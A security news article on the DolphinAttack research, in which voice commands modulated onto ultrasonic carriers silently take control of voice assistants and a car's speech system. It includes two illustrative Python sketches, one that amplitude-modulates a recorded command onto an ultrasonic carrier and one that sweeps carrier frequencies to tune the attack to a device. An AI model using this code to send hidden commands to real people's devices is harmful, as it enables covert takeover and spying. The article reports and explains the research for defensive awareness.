Consumers love the convenience of virtual assistants such as Siri, Alexa and Cortana, but a group of researchers has discovered an easy way to compromise the software behind them using ultrasonic commands that are inaudible to the human ear.
DolphinAttack Experiment Breaches Speech Recognition Software
Six scientists from Zhejiang University in China posted a video showing how these inaudible voice commands work. The researchers dubbed their experiment the “DolphinAttack” because dolphins communicate using high-frequency sounds that humans cannot hear. Using simple off-the-shelf hardware costing only $3, they were able to breach speech recognition software from Apple, Google, Amazon and others. Modulating voice commands onto ultrasonic frequencies allowed them to take over smartphones, speakers and even a smart car model from Audi.
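At its core, the technique amplitude-modulates an ordinary voice command onto an ultrasonic carrier; nonlinearities in a device’s microphone hardware then demodulate the signal back into the audible range, where the assistant hears it as normal speech. The Python sketch below is purely illustrative and is not the researchers’ code; the carrier frequency, sample rate and file names are assumptions chosen for the example.

```python
# Illustrative sketch of the DolphinAttack idea: amplitude-modulate a recorded
# voice command onto an ultrasonic carrier. Parameters and file names are
# hypothetical, not values from the study.
import numpy as np
from scipy.io import wavfile

CARRIER_HZ = 25_000      # assumed ultrasonic carrier; real attacks tune this per device
OUTPUT_RATE = 96_000     # output sample rate high enough to represent the carrier

# Load a hypothetical recording of a voice command and normalize it to [-1, 1].
rate, voice = wavfile.read("hey_siri_command.wav")
voice = voice.astype(np.float64)
if voice.ndim > 1:
    voice = voice[:, 0]              # keep one channel if the file is stereo
voice /= np.max(np.abs(voice))

# Resample the baseband voice to the output rate (simple linear interpolation).
t_old = np.arange(len(voice)) / rate
t_new = np.arange(0, t_old[-1], 1 / OUTPUT_RATE)
baseband = np.interp(t_new, t_old, voice)

# Standard AM: the carrier scaled by (1 + voice). A nonlinear microphone
# front end recovers the audible command from this inaudible signal.
carrier = np.cos(2 * np.pi * CARRIER_HZ * t_new)
modulated = 0.5 * carrier * (1.0 + baseband)

wavfile.write("ultrasonic_command.wav", OUTPUT_RATE,
              (modulated * 32767).astype(np.int16))
```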
Although most of what the researchers did was fairly innocuous, such as launching music or video calling applications, malicious actors could turn a DolphinAttack to far more nefarious purposes, Bleeping Computer pointed out. The technique could be used to spy on device users, steer their browsers toward malware-laden URLs or even manipulate the navigation system of a smart car.
As security expert Tavish Vaidya told New Scientist, the security stakes are high because voice assistants are now capable of much more than setting an alarm or playing music. The DolphinAttack technique has emerged at a time when speech recognition software is built into a wide variety of applications designed with convenience in mind. Besides looking up information online, for example, many people now use tools such as Google Now or Siri to manage digital accounts for payments and other transactions.
Attack Limitations and Remaining Threats
Fortunately, there are some limitations to a DolphinAttack. Would-be threat actors would need to be within a few feet of a device, and the attack might not work in a very loud environment, The Verge reported. While the audio equipment used to break into the speech recognition software was cheap, it might need to be customized for a specific device based on the frequencies a particular microphone picks up best. Savvy consumers might also notice an attack in progress, and many devices require users to confirm a command or unlock the screen before anything harmful can happen.
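That per-device customization can be pictured as a simple frequency sweep: generate the same modulated command at several candidate carriers and keep whichever one the target microphone reliably demodulates. The sketch below is a hypothetical illustration of that idea; the candidate frequencies, the test tone and the helper function are assumptions, not measurements from the study.

```python
# Hedged sketch: build probe signals at several candidate carrier frequencies,
# since the most effective carrier differs from microphone to microphone.
import numpy as np

CANDIDATE_CARRIERS_HZ = [23_000, 25_000, 27_000, 30_000]  # assumed sweep range
RATE = 96_000                                             # assumed sample rate

def am_modulate(baseband: np.ndarray, carrier_hz: float, rate: int) -> np.ndarray:
    """Amplitude-modulate a normalized baseband signal onto one carrier."""
    t = np.arange(len(baseband)) / rate
    return 0.5 * np.cos(2 * np.pi * carrier_hz * t) * (1.0 + baseband)

# A one-second 440 Hz test tone stands in for a real voice command.
baseband = np.sin(2 * np.pi * 440 * np.arange(RATE) / RATE)

# One probe signal per candidate carrier; an attacker would play each back
# and keep the carrier the target device responds to most reliably.
probes = {f_c: am_modulate(baseband, f_c, RATE) for f_c in CANDIDATE_CARRIERS_HZ}
```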
Still, the researchers demonstrated that a recording of a potential victim’s voice could defeat speech recognition software, such as Siri, that is trained to respond only to a specific user. The Hacker News suggested the best way to prevent a DolphinAttack is to turn off voice commands or wait for vendors to ensure ultrasound can’t be turned against their customers.